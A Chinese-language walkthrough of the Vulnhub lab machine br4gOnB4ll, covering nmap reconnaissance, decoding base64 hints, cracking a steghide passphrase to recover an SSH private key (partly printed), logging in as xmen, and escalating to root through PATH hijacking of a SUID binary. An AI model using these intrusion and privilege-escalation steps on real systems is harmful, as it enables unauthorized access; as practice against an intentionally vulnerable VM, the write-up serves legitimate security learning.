br4gOnB4ll靶机笔记
br4gOnB4ll靶机笔记
这是一台vulnhub上的免费靶机,比较简单。
1、主机发现
主机发现 -sn 只做ping扫描,不做端口扫描
nmap -sn 192.168.84.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:37 EDT
Nmap scan report for 192.168.84.1
Host is up (0.00045s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.84.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:FC:23:E6 (VMware)
Nmap scan report for 192.168.84.154
Host is up (0.00024s latency).
MAC Address: 00:0C:29:30:12:59 (VMware)
Nmap scan report for 192.168.84.254
Host is up (0.00027s latency).
MAC Address: 00:50:56:FA:CE:D8 (VMware)
Nmap scan report for 192.168.84.133
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds
发现192.168.84.154 为目标靶机
2、nmap常规端口扫描
1)端口探测
# -sT tcp全连接扫描 --min-rate 以最低速率10000扫描 -p- 扫描全端口
nmap -sT --min-rate 10000 -p- 192.168.84.154
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:43 EDT
Nmap scan report for 192.168.84.154
Host is up (0.00092s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:30:12:59 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
发现22 ssh端口,80 http端口
2)端口版本详情探测
# -sT tcp全连接扫描 -sV 探测端口服务版本 -sC 使用默认脚本扫描 -O 探测目标操作系统
nmap -sT -sV -sC -O -p22,80 192.168.84.154
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:52 EDT
Nmap scan report for 192.168.84.154
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b5774c88d727541c561d48d9a41e2891 (RSA)
| 256 c6a8c89eed0d671faead6bd5ddf157a1 (ECDSA)
|_ 256 faa9b0e3062b9263ba112f94d63190b2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: DRAGON BALL | Aj's
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:30:12:59 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds
3、web端,用浏览器访问80端口
1)信息搜集与查找
发现网页 DRAGON BALL 查看页面内容,阅读完这后,并没有发现有用的信息。
去查看 /robots目录,网页源码等信息,必要的时候做目录爆破
a、查看robots.txt
发现一段字符串,以=结尾,应该是base64,用base64破解一下
echo -n "eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=" | base64 -d
you find the hidden dir // 结果是一段明文,说我找到了一个隐藏的目录
b、查看网页源代码
base64破解一下
echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d
UkZKQlIwOU9JRUpCVEV3PQ== #还是base64,接着破解
echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d
RFJBR09OIEJBTEw= #被套娃了,没事我们接着破解
echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d | base64 -d
DRAGON BALL #终于破解出来了
集合a,b的信息,我们有理由怀疑
DRAGON BALL就是隐藏得目录,拼在url后边看看
2)发现隐藏目录
http://192.168.84.154/DRAGON%20BALL/ # %20 是url编码的空格符号
查看相关信息
a)secret.txt自动化扫描
wget http://192.168.84.154/DRAGON%20BALL/secret.txt #下载下来
cat secret.txt
/facebook.com
/youtube.com
/google.com
/vanakkam nanba
/customer
/customers
/taxonomy
/username
/passwd
/yesterday
/yshop
/zboard
/zeus
/aj.html
/zoom.html
/zero.html
/welcome.html
secret.txt的内容看起来是一堆目录,去手动访问了几个都是404,我们写脚本去访问以免漏掉有用的信息
vim secret.txt #删除末尾两个空行,以免造成干扰
自动化shell编写, 思路:拼好url路径,用curl去访问,看返回状态码等信息
因为不确定url前边的路径,我们把我们所知道的目录进行拼接
#1、在开头添加http://192.168.84.154 s 表示替换
sed 's|^|http://192.168.84.154|' secret.txt | tee secret_ext.txt
#2、拼接/DRAGON%20BALL tee中 -a 表示追加 不加的话会覆盖原始文件
sed 's|^|http://192.168.84.154/DRAGON%20BALL|' secret.txt | tee -a secret_ext.txt
#3、拼接Vulnhub
sed 's|^|http://192.168.84.154/DRAGON%20BALL/Vulnhub|' secret.txt | tee -a secret_ext.txt
#4、手动改一下空格,就三处
vim secret_ext.txt
# /vanakkam nanba ==> /vanakkam%20nanba
访问
-r 处理 / 特殊字符 -o /dev/null输出全不要,-s静默访问,-w自定义输出 url_effecive生效的url,url_code状态码
while read -r url;do curl -o /dev/null -s -w "%{url_effective} http code:%{http_code}\n" "$url";done < secret_ext.txt
http://192.168.84.154/facebook.com http code:404
http://192.168.84.154/youtube.com http code:404
http://192.168.84.154/google.com http code:404
http://192.168.84.154/vanakkam%20nanba http code:404
http://192.168.84.154/customer http code:404
http://192.168.84.154/customers http code:404
http://192.168.84.154/taxonomy http code:404
http://192.168.84.154/username http code:404
http://192.168.84.154/passwd http code:404
http://192.168.84.154/yesterday http code:404
http://192.168.84.154/yshop http code:404
http://192.168.84.154/zboard http code:404
http://192.168.84.154/zeus http code:404
http://192.168.84.154/aj.html http code:404
http://192.168.84.154/zoom.html http code:404
http://192.168.84.154/zero.html http code:404
http://192.168.84.154/welcome.html http code:404
http://192.168.84.154/DRAGON%20BALL/facebook.com http code:404
http://192.168.84.154/DRAGON%20BALL/youtube.com http code:404
http://192.168.84.154/DRAGON%20BALL/google.com http code:404
http://192.168.84.154/DRAGON%20BALL/vanakkam%20nanba http code:404
http://192.168.84.154/DRAGON%20BALL/customer http code:404
http://192.168.84.154/DRAGON%20BALL/customers http code:404
http://192.168.84.154/DRAGON%20BALL/taxonomy http code:404
http://192.168.84.154/DRAGON%20BALL/username http code:404
http://192.168.84.154/DRAGON%20BALL/passwd http code:404
http://192.168.84.154/DRAGON%20BALL/yesterday http code:404
http://192.168.84.154/DRAGON%20BALL/yshop http code:404
http://192.168.84.154/DRAGON%20BALL/zboard http code:404
http://192.168.84.154/DRAGON%20BALL/zeus http code:404
http://192.168.84.154/DRAGON%20BALL/aj.html http code:404
http://192.168.84.154/DRAGON%20BALL/zoom.html http code:404
http://192.168.84.154/DRAGON%20BALL/zero.html http code:404
http://192.168.84.154/DRAGON%20BALL/welcome.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/facebook.com http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/youtube.com http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/google.com http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/vanakkam%20nanba http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/customer http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/customers http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/taxonomy http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/username http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/passwd http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/yesterday http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/yshop http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zboard http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zeus http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/aj.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zoom.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zero.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/welcome.html http code:404
全部为404,明显没有用
b)Vuln目录
里面有一张图片aj.jpg,和一个登陆页面login.html
图片下载下来,login页面中有xmen,猜测会不会是用户名呢
wget http://192.168.84.154/DRAGON%20BALL/Vulnhub/aj.jpg
查看图片信息
ls -liah aj.jpg
4850810 -rw-r--r-- 1 root root 74K 2021年 1月 5日 aj.jpg
file aj.jpg
aj.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 959x535, components 3
#查看是否有捆绑
binwalk aj.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
#没有发现
# 是否有图片隐写信息
steghide info aj.jpg
"aj.jpg":
format: jpeg
capacity: 4.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
提示:这里是steghide的本身交互内容,并不能判断aj.jpg是否存在隐写内容,我们不知道passphrase,所以还不能判断
我们判断有无隐写,要结合技术观察和攻击面的研判,去综合判断
尝试爆破:
stegseek aj.jpg /usr/share/wrodlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "love"
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".
输出了 aj.jpg.out 原名字为 id_rsa 看起来是一个凭据
mv aj.jpg.out id_rsa #回复命名
cat id_rsa #查看内容
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAwG6N5oDbTLLfRAwa7GCQw5vX0GWMxe56fzIEHYmWQw54Gb1qawl/
x1oGXLGvHLPCQaFprUek6CA8u2XPLiJ7SZqGAIg6XyyJY1xCmnoaU++AcI9IrgSzNyYlSF
o+QEIvwkNNA1mx9HuhRmANb06ZGzYDY6pGNvTSyvD4ihqiAXTye2A/cZmw7p5KLt4U0hSA
qucYb/IA4aa/lThOSp5QWSmPKaTm0FALRX38dRWbTBv5iR/qQFDheot+G3FlfGWqEBNuX8
SWnloCMT7QU+2N3YZYoDLI3zrQIOotKPbIUOWzciVpLXpnHPuKmHQ2SX6oJYmqpESID6l5
9ciPQzn2d7yGTZcyYO0PtnfBFngoNL1f55puIly39XeNWiUPebVSb5jBEyl+3pZ96s/BO5
Wvdopgb5VQX3h0832L3AkgW2X3tQp5FdkE/9nqxkSMfzZ6YdadpGVY5KboFiMnxWQyvB0a
ucq45Tn9kyfAAj2AQF46L9udVE4ylEkKw17oVaD5AAAFgKIce5GiHHuRAAAAB3NzaC1yc2
EAAAGBAMBujeaA20yy30QMGuxgkMOb19BljMXuen8yBB2JlkMOeBm9amsJf8daBlyxrxyz
wkGhaa1HpOggPLtlzy4ie0mahgCIOl8siWNcQpp6GlPvgHCPSK4EszcmJUhaPkBCL8JDTQ
NZsfR7oUZgDW9OmRs2A2OqRjb00srw+IoaogF08ntgP3GZsO6eSi7eFNIUgKrnGG/yAOGm
v5U4TkqeUFkpjymk5tBQC0V9/HUVm0wb+Ykf6kBQ4XqLfhtxZXxlqhATbl/Elp5aAjE+0F
Ptjd2GWKAyyN860CDqLSj2yFDls3IlaS16Zxz7iph0Nkl+qCWJqqREiA+pefXIj0M59ne8
hk2XMmDtD7Z3wRZ4KDS9X+eabiJct/V3jVolD3m1Um+YwRMpft6WferPwTuVr3aKYG+VUF
看开头 明显是ssh的凭据
4、需找立足点
尝试ssh连接
chmod 600 id_rsa # 给执行权限
ssh root@192.168.84.154 -i id_rsa
root@192.168.84.154's password:
Permission denied, please try again.
显然id_rsa不是root用户的凭据
我们想到login.html中有 xmen会不会是此凭据用户,进行尝试
ssh xmen@192.168.84.154 -i id_rsa
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 4 04:03:23 2024 from 192.168.84.133
xmen@debian:~$
成功进入
查看信息
xmen@debian:~$ uname -a
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
xmen@debian:~$ id
uid=1000(xmen) gid=1000(xmen) groups=1000(xmen),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
xmen@debian:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:30:12:59 brd ff:ff:ff:ff:ff:ff
inet 192.168.84.154/24 brd 192.168.84.255 scope global dynamic ens33
valid_lft 1099sec preferred_lft 1099sec
inet6 fe80::20c:29ff:fe30:1259/64 scope link
valid_lft forever preferred_lft forever
5、提权到root
查看root权限的文件,U+S的文件
find / -perm -4000 -type f 2> /dev/null
/home/xmen/script/shell
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
有属于用户目录的/home/xmen/script/shell,root权限脚本即去看一下
xmen@debian:~/script$ ls -liah
total 32K
269007 drwxr-xr-x 2 root root 4.0K Jan 4 2021 .
267590 drwxr-xr-x 4 xmen xmen 4.0K Jul 4 04:15 ..
269009 -rw-r--r-- 1 root root 75 Jan 4 2021 demo.c
269016 -rwsr-xr-x 1 root root 17K Jan 4 2021 shell
查看 demo.c
xmen@debian:~/script$ cat demo.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("ps");
}
运行 shell脚本
xmen@debian:~/script$ ./shell
PID TTY TIME CMD
1232 pts/0 00:00:00 shell
1233 pts/0 00:00:00 sh
1234 pts/0 00:00:00 ps
我们怀疑shell脚本运行的就是demo.c的代码
利用system("ps")进行提权
cd /home/xmen
echo "/bin/bash" > ps
chmod 777 ps
export PATH=.:$PATH
which ps
xmen@debian:~$ which ps
./ps
执行 shell脚本
xmen@debian:~$ /home/xmen/script/shell
root@debian:~#
成功提权到root
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(xmen)
拿到flag
root@debian:/root# cat /root/proof.txt
_____ __________
/ \\______ \ ___ ___ _____ ____ ____
/ \ / \| _/ \ \/ // \_/ __ \ / \
/ Y \ | \ > <| Y Y \ ___/| | \
\____|__ /____|_ /__________/__/\_ \__|_| /\___ >___| /
\/ \/_____/_____/ \/ \/ \/ \/
join channel: https://t.me/joinchat/St01KnXzcGeWMKSC
your flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2
总结
1、通过nmap扫描到22 ssh,80 http服务
2、对http服务进行分析,通过robots.txt和网页源码等信息,发现了隐藏目录DRAGON BALL目录,进去后,看到secret.txt和Vulnhub目录对两个进行分析
3、在Vulnhub目录下查看到aj.jpg图片和login.html网页
1)aj.jpg破解出了ssh的凭据id_rsa
2)login.html发现了凭据的用户xmen
4、成功获得普通用户xmen的权限后,查看u+s权限文件,进行SUID提权到root权限
5、成功获得root的flag
br4gOnB4ll靶机笔记的更多相关文章
- vulnhub靶机Tr0ll:1渗透笔记
Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信 ...
- vulnhub靶机djinn:1渗透笔记
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali i ...
- sqli-labs靶机注入笔记1-10关
嗯,开始记录sqli-lab的每关笔记,复习一次 1-2关 基于错误的字符串/数字型注入 闭合的符号有区别而已 http://www.sqli-lab.cn/Less-1/?id=1 or 1=1 - ...
- vulnhub 靶机 Kioptrix Level 1渗透笔记
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 1 ...
- 渗透测试全流程靶机vulnhubDC-1完成笔记
镜像下载地址 https://www.vulnhub.com/entry/dc-1-1,292/ 信息收集 1.可以使用netdiscover -i eth0 发现二层网络信息 发现两个设备(103是 ...
- 25. CTF综合靶机渗透(17)
靶机链接 https://www.vulnhub.com/entry/the-ether-evilscience,212 运行环境 本靶机提供了VMware的镜像,从Vulnhub下载之后解压,运行v ...
- Metasploit和python两种安全工具的学习笔记
Metasploit是个好东西 主要参考了<Metasploit渗透测试魔鬼训练营>这本书. 一.先用自己的靶机感受一下该工具的强大 linux靶机的ip如图 按照书上写的配置,如图 然后 ...
- Cobalt Strike学习笔记
Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java ...
- vulnhub-DC:4靶机渗透记录
准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...
- DC-7 靶机渗透测试
DC-7 渗透测试 冲冲冲,好好学习 .对管道符的理解加深了好多.最后提权时,遇到了点麻烦.想不懂一条命令为啥能执行生效,耗了一整天才算解决掉. 操作机:kali 172.66.66.129 靶机:D ...
随机推荐
- lovelive - μ's
Tips:当你看到这个提示的时候,说明当前的文章是由原emlog博客系统搬迁至此的,文章发布时间已过于久远,编排和内容不一定完整,还请谅解` lovelive - μ's 日期:2017-12-16 ...
- SpringBoot动态数据源配置
SpringBoot动态数据源配置 序:数据源动态切换流程图如下: 1:pom.xml文件依赖声明 <dependency> <groupId>org.springfram ...
- Linux中的IDR机制
# Linux中的IDR机制 背景 最近在学习 Linux的i2c子系统,看到代码中有关于IDR的调用.了解了一下有关的文档,发现是用来管理指针(对象实例). //based on linux V3. ...
- 一招解决github访问慢的问题
之前我在网上搜过解决办法,其中一个是修改 hosts 文件,但是效果不太理想.我在这里给大家推荐github上的一个开源项目:FastGithub .用了这个之后,效果就比较理想了,次次都能访问到 ...
- 嵌入式基础测试手册——基于NXP iMX6ULL开发板(4)
前 言 本文档适用开发环境: Windows开发环境:Windows 7 64bit.Windows 10 64bit 虚拟机:VMware15.1.0 Linux开发环境:Ubuntu18.04.4 ...
- 能说下 vue-router 中常用的 hash 和 history 路由模式实现原理吗?
这个router有两种模式:hash模式(默认).history模式(需配置mode: 'history') 然后,我们来研究下两者的原理: 我们先来认识下这位朋友#,这个#就是hash符号,中文名哈 ...
- Spring5.X的注解配置项目
pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt ...
- 【PHP】关于fastadmin框架中使用with进行连表查询时setEagerlyType字段的理解
前言 FastAdmin是我第一个接触的后台管理系统框架.FastAdmin是一款开源且免费商用的后台开发框架,它基于ThinkPHP和Bootstrap两大主流技术构建的极速后台开发框架,它有着非常 ...
- CM3调试系统简析
CM3 调试系统简析 **"一直以来,单片机的调试一直不是很突出的主题,很多简单些的程序在开发中,甚至都没有调试的概念,而只是把生成的映像直接烧入片子,再根据错误症状来判断问题,然后修改程序 ...
- 学习Java的第一周总结
经历了一周关于Java的学习后,我想已经初步了解了Java.在这一周中我跟随黑马程序员的脚步初步学习,现在已经安装了jdk环境(当然它不只是一个运行环境,还附带了许多开发工具)并能够用它输出" ...